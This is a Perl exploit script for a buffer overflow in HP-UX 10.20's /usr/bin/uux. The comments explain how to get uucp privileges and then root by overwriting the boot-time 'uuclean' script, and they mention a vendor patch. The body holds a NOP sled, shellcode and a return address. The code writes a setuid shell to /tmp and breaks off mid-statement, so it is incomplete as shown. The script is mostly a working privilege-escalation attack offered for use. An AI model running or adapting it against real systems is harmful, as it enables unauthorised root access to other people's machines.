#!/usr/bin/perl # # # The /usr/bin/uux tool that comes with the HP-UX 10.20 install contains a # buffer overflow vulnerability. To reproduce this: # # /usr/bin/uux `perl -e 'print "A" x 5391;print "BBBBB"'` # # The overflow vulnerability can be used to gain uucp privileges. Once uucp # privileges have been obtained, it is possible to overwrite the file 'uuclean' with # any kind of code. Because this file is executed by the S202clean_uucp script # during boot time of a default HP-UX 10.20 install, we can gain root access. # # By default this exploit gives you the setuid uucp shell /tmp/ohoh. Ask your # administrator to reboot the box and chances are high that /tmp/ohoh will be # setuid root afterwards. # # HP-UX administrators who never applied PHCO_19198 should do so now: # http://support2.itrc.hp.com/service/patch/patchDetail.do?patchid=PHCO_19198 # # Until the patch is applied, check that 'uuclean' cannot be modified by the # uucp user and look for unexpected setuid files in /tmp. # # zillion (http://www.safemode.org 30/07/2002) # # Shellcode was made with the help of: # http://scorpions.net/~fygrave/misc/hpux_bof.pdf $shellcode = "\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04". "\x02\x60\x40\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18". "\x02\x98\x34\x16\x04\xbe\x20\x20\x08\x01\xe4\x20\xe0\x08\x96". "\xd6\x05\x34\xde\xad\xca\xfe\x2f\x74\x6d\x70\x2f\x42\x65\xff"; $nop = "\x08\x63\x02\x43"; $buffer = "A" x (1191 - length($shellcode)); for($i = 0; $i < 4200; $i +=4) { $buffer .= $nop; } $buffer .= $shellcode; $buffer .= "\x7b\x03\xb3\xc0"; open(FILE, ">/tmp/be.c") || die("Error, cannot open file /tmp/be.c : $!\n"); print FILE<